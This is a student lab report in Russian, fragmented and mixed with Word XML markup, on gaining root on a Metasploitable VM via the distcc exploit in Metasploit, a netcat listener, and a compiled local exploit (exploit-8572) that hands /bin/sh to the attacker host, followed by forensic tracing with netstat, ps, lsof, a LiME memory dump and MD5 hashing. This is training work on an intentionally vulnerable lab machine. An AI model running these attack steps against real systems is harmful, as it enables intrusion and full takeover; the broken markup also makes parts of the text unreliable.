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ЛАБОРАТОРНАЯ РАБОТА №2. ИСПОЛЬЗОВАНИЕ DISTCC ДЛЯ ПОЛУЧЕНИЯ ПРАВ ROOT. СОЗДАНИЕ ДАМПА ПАМЯТИ LIME И ЕГО АНАЛИЗ.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Касаткин Александр Денисович</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">11-902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Запуск эксплоита distcc используя Metasploit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Сканируем открытые порты с помощью NMAP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Открываем консоль Metasploit и выполняем:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> use exploit/unix/misc/distcc_exec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Настраиваем эксплоит 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нашем случае это cmd/unix/bind_ruby и 192.168.109.134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Выполняем exploit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Теперь получили доступ к консоли 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Получение доступа к Metasploitable.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Прослушиваем порт 4444 в новой консоли командой </w:t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netcat -vlp 4444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Скачиваем эксплоит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Компилируем эксплоит командой </w:t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gcc exploit-8572.c -o exploit-8572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Создадим скрипт для предоставления консоли по netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr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Форезинка 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Выявление аномальной активности. Привязываем сетевые подключения к идентификаторам процессов.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netstat –noap | less; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr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192.168.109.132, использующие порт 4444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SH_PID 5501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RUBY_PID 5467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ps -eaf | grep RUBY_PID | grep -v grep; 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RUBY_PID выполняет скрипт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s5fuxywxvoe0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ps -eaf | grep SH_PID | grep -v grep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r7473udubdf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найдем P_SH_PID – pid родительского процесса SH_PID</w:t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ps -eaf | grep P_SH_PID | grep -v grep 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lsof –p RUBY_PID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 Metasploitable до Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr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lsof –p SH_PID;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root, идущие от Metasploitable до Kali Linux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4v4n8nmsbcb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cat /tmp/run </w:t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fg9blckex7u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Клиент netcat подключился к серверу 192.168.109.132:4444 и предоставил ему /bin/sh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b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ou03p9s4aoe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Создание дампа памяти с помощью LiME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Подготовка директории. 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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ubcy17n795ik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Создадим каталог /var/www/distcc командой mkdir –p /var/www/distcc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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xk4dcenk8uc7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Сменим владельца директории командой chown www-data:www-data /var/www/distcc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измените права доступа командой chmod 755 /var/www/distcc;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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_55o3jvnh9mzv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Изменим права доступа командой chmod 755 /var/www/distcc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gqo63pu315vz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Создадим дамп оперативной памяти Metasploitable c помощью команды insmod ./lime-2.6.24-16-server.ko "path=/var/www/distcc/distcc_memory.lime format=lime"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aldiexh1wrho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Сохраним  сведений о состоянии сетевых соединений и слушаемых на данном компьютере портах командой netstat -naop &gt; /var/www/distcc/distcc_netstat.txt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likwk5p325f8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Сохраним вывод информации о том, какие файлы используются теми или иными процессами в системе командой lsof &gt; /var/www/distcc/distcc_lsof.txt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Сохраним отчёт о работающих процессах командой ps -eaf &gt; /var/www/distcc/distcc_pseaf.txt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 Создание MD5 хеш-суммы.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перейти в каталог /var/www/distcc/ командой cd /var/www/distcc/; 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выполнить создание MD5 хеш-сумм командой md5sum * | tee distcc_md5.txt.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Результаты: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6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